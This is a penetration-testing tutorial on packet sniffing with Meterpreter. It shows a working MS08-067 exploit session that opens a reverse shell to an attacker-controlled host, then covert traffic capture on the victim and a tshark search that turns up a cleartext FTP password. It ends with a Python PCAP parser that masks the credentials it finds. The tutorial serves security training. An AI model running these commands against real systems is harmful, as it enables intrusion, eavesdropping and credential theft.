Meterpreter can sniff packets on a remote host without ever touching the disk. This is especially useful when we want to see what kind of information is being sent and, even better, it can be the starting point for several auxiliary modules that eventually search a capture file for sensitive data. The sniffer module can store up to 200,000 packets in a ring buffer and export them in standard PCAP format, so you can process them with psnuffle, dsniff, Wireshark and similar tools.
We first launch a remote exploit against the victim and obtain a standard reverse Meterpreter console.
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 10.211.55.126
msf exploit(ms08_067_netapi) > set RHOST 10.10.1.119
msf exploit(ms08_067_netapi) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (10.10.1.4:4444 -> 10.10.1.119:1921)
From here, we start the sniffer on interface 2 and begin collecting packets. We then dump the sniffer output to /tmp/all.cap.
meterpreter > use sniffer
Loading extension sniffer...success.

meterpreter > help

Sniffer Commands
================

    Command             Description
    -------             -----------
    sniffer_dump        Retrieve captured packet data
    sniffer_interfaces  List all remote sniffable interfaces
    sniffer_start       Capture packets on a previously opened interface
    sniffer_stats       View statistics of an active capture
    sniffer_stop        Stop packet captures on the specified interface

meterpreter > sniffer_interfaces

1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
3 - 'Intel(R) PRO/1000 MT Network Connection' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )

meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)

meterpreter > sniffer_dump 2 /tmp/all.cap
[*] Dumping packets from interface 2...
[*] Wrote 19 packets to PCAP file /tmp/all.cap

meterpreter > sniffer_stats 2
[*] Capture statistics for interface 2
        packets: 4632
        bytes: 1978363

meterpreter > sniffer_dump 2 /tmp/all.cap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 5537 packets (3523012 bytes)
[*] Downloaded 014% (524288/3523012)...
[*] Downloaded 029% (1048576/3523012)...
[*] Downloaded 044% (1572864/3523012)...
[*] Downloaded 059% (2097152/3523012)...
[*] Downloaded 074% (2621440/3523012)...
[*] Downloaded 089% (3145728/3523012)...
[*] Downloaded 100% (3523012/3523012)...
[*] Download completed, converting to PCAP...
[-] Corrupted packet data (length:10359)
[*] PCAP file written to /tmp/all.cap

meterpreter > sniffer_stop 2
[*] Capture stopped on interface 2
[*] There are 279 packets (57849 bytes) remaining
[*] Download or release them using 'sniffer_dump' or 'sniffer_release'

meterpreter > sniffer_release 2
[*] Flushed 279 packets (57849 bytes) from interface 2

meterpreter >
We can now use our favourite parser or packet analysis tool to review the intercepted information.
The Meterpreter packet sniffer uses the MicroOLAP Packet Sniffer SDK and can sniff packets from the victim machine without installing any drivers or writing to the file system. The module is also smart enough to recognize its own traffic and automatically removes any traffic belonging to the Meterpreter interaction. In addition, Meterpreter tunnels all information over SSL/TLS, so it is fully encrypted in transit.
Packet Recorder
As an alternative to using the sniffer extension, Carlos Perez wrote the packetrecorder Meterpreter script, which offers more granularity when capturing packets. To see the available options, we issue the run packetrecorder command without any arguments.
meterpreter > run packetrecorder
Meterpreter Script for capturing packets in to a PCAP file
on a target host given a interface ID.

OPTIONS:

    -h        Help menu.
    -i <opt>  Interface ID number where all packet capture will be done.
    -l <opt>  Specify and alternate folder to save PCAP file.
    -li       List interfaces that can be used for capture.
    -t <opt>  Time interval in seconds between recollection of packet, default 30 seconds.
Before we start sniffing traffic, we first need to determine which interfaces are available to us.
meterpreter > run packetrecorder -li

1 - 'Realtek RTL8139 Family PCI Fast Ethernet NIC' ( type:4294967295 mtu:0 usable:false dhcp:false wifi:false )
2 - 'Citrix XenServer PV Ethernet Adapter' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
3 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
We will start sniffing traffic on the second interface, save the logs to the desktop of our Kali system, and let the sniffer run for a while.
meterpreter > run packetrecorder -i 2 -l /root/
[*] Starting Packet capture on interface 2
[+] Packet capture started
[*] Packets being saved in to /root/logs/packetrecorder/XEN-XP-SP2-BARE_20101119.5105/XEN-XP-SP2-BARE_20101119.5105.cap
[*] Packet capture interval is 30 Seconds
^C
[*] Interrupt
[+] Stopping Packet sniffer...
meterpreter >
There is now a capture file waiting for us that can be analysed in a tool such as Wireshark or tshark. We take a quick look to see whether anything interesting was captured.
root@kali:~/logs/packetrecorder/XEN-XP-SP2-BARE_20101119.5105# tshark -r XEN-XP-SP2-BARE_20101119.5105.cap |grep PASS
Running as user "root" and group "root". This could be dangerous.
2489  82.000000 192.168.1.201 -> 209.132.183.61 FTP Request: PASS s3cr3t
2685  96.000000 192.168.1.201 -> 209.132.183.61 FTP Request: PASS s3cr3t
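The tshark one-liner above is the manual version of what an analyst does when reviewing a capture for cleartext credentials, and the "Corrupted packet data" line in the earlier sniffer_dump session is the kind of record-length problem a PCAP consumer has to cope with. The following added example (written for this page, not code from the Metasploit project or from the packetrecorder script) builds a small, constructed capture in memory that reproduces the FTP login seen in the tshark output, then parses the classic PCAP container, flags records whose claimed length exceeds the file's snaplen or runs past the end of the file, and reports FTP USER/PASS commands with the password masked. All addresses, ports and frames are constructed sample data; the bogus record length of 70000 is chosen here to trigger the corruption check.

```python
import socket
import struct

# Classic (usec-resolution) pcap magic in either byte order; the value read
# little-endian tells us how the rest of the file was written.
PCAP_MAGICS = {0xA1B2C3D4: "<", 0xD4C3B2A1: ">"}
LINKTYPE_ETHERNET = 1
SNAPLEN = 65535


def build_frame(src_ip, dst_ip, sport, dport, payload):
    """Constructed Ethernet/IPv4/TCP frame. Checksums are left at zero because
    the reader below does not verify them (tshark would flag them as bad)."""
    eth = b"\x00" * 12 + b"\x08\x00"                      # dst MAC, src MAC, EtherType IPv4
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload), 0, 0,
                     64, 6, 0, socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    return eth + ip + tcp + payload


def build_pcap(records):
    """Serialise (ts_sec, frame, claimed_len) tuples into a little-endian pcap file.
    claimed_len lets a record header lie about its length, emulating a corrupted record."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, SNAPLEN, LINKTYPE_ETHERNET)]
    for ts_sec, frame, claimed in records:
        incl = len(frame) if claimed is None else claimed
        out.append(struct.pack("<IIII", ts_sec, 0, incl, incl) + frame)
    return b"".join(out)


def build_sample_capture():
    """Constructed capture: an FTP login (same hosts as the page's tshark output), an
    unrelated HTTP request, and a final record whose header claims 70000 bytes."""
    cli, srv = "192.168.1.201", "209.132.183.61"
    return build_pcap([
        (82, build_frame(cli, srv, 51515, 21, b"USER anonymous\r\n"), None),
        (82, build_frame(cli, srv, 51515, 21, b"PASS s3cr3t\r\n"), None),
        (83, build_frame(cli, "198.51.100.10", 51516, 80, b"GET / HTTP/1.0\r\n\r\n"), None),
        (84, build_frame(cli, srv, 51515, 21, b"QUIT\r\n"), 70000),   # corrupted length
    ])


def read_pcap(data):
    """Parse a classic pcap file. Returns (linktype, [(timestamp, frame), ...], errors).
    Parsing stops at the first record whose length cannot be trusted, because every
    later record offset is derived from it."""
    if len(data) < 24:
        raise ValueError("too short to be a pcap file")
    magic = struct.unpack("<I", data[:4])[0]
    if magic not in PCAP_MAGICS:
        raise ValueError("unrecognised pcap magic 0x%08x" % magic)
    end = PCAP_MAGICS[magic]
    _major, _minor, _tz, _sig, snaplen, linktype = struct.unpack(end + "HHiIII", data[4:24])
    packets, errors = [], []
    off = 24
    while off + 16 <= len(data):
        ts_sec, ts_usec, incl_len, orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        if incl_len > snaplen or incl_len > orig_len:
            errors.append("corrupted record at offset %d (length:%d)" % (off - 16, incl_len))
            break
        if off + incl_len > len(data):
            errors.append("truncated record at offset %d" % (off - 16))
            break
        packets.append((ts_sec + ts_usec / 1e6, data[off:off + incl_len]))
        off += incl_len
    else:
        if off != len(data):
            errors.append("%d trailing bytes after last record" % (len(data) - off))
    return linktype, packets, errors


def parse_tcp(frame, linktype=LINKTYPE_ETHERNET):
    """Return (src, dst, sport, dport, payload) for an Ethernet/IPv4/TCP frame, else None."""
    if linktype != LINKTYPE_ETHERNET or len(frame) < 54 or frame[12:14] != b"\x08\x00":
        return None
    ip = frame[14:]
    if ip[0] >> 4 != 4 or ip[9] != 6:                     # IPv4 carrying TCP only
        return None
    ihl = (ip[0] & 0x0F) * 4
    total_len = struct.unpack("!H", ip[2:4])[0]
    tcp = ip[ihl:total_len]
    sport, dport = struct.unpack("!HH", tcp[:4])
    doff = (tcp[12] >> 4) * 4
    return socket.inet_ntoa(ip[12:16]), socket.inet_ntoa(ip[16:20]), sport, dport, tcp[doff:]


def find_cleartext_logins(data):
    """Report FTP USER/PASS commands in the capture; the password itself is masked so
    the report can be shared without re-exposing the credential."""
    linktype, packets, errors = read_pcap(data)
    findings = []
    for ts, frame in packets:
        parsed = parse_tcp(frame, linktype)
        if parsed is None or parsed[3] != 21:
            continue
        src, dst, _sport, _dport, payload = parsed
        for line in payload.split(b"\r\n"):
            if line[:5] in (b"USER ", b"PASS "):
                cmd, arg = line[:4].decode(), line[5:].decode("ascii", "replace")
                if cmd == "PASS":
                    arg = arg[:1] + "*" * (len(arg) - 1)
                findings.append({"time": ts, "src": src, "dst": dst, "command": cmd, "argument": arg})
    return findings, errors


if __name__ == "__main__":
    found, problems = find_cleartext_logins(build_sample_capture())
    for f in found:
        print("%(time)10.6f %(src)s -> %(dst)s FTP %(command)s %(argument)s" % f)
    for p in problems:
        print("[-] " + p)
```

Pointing `read_pcap` at a real file from `sniffer_dump` or packetrecorder is a matter of `open(path, "rb").read()`; the length checks are what keep a single bad record from turning the rest of the file into garbage, which is why the reader stops rather than guessing where the next record starts.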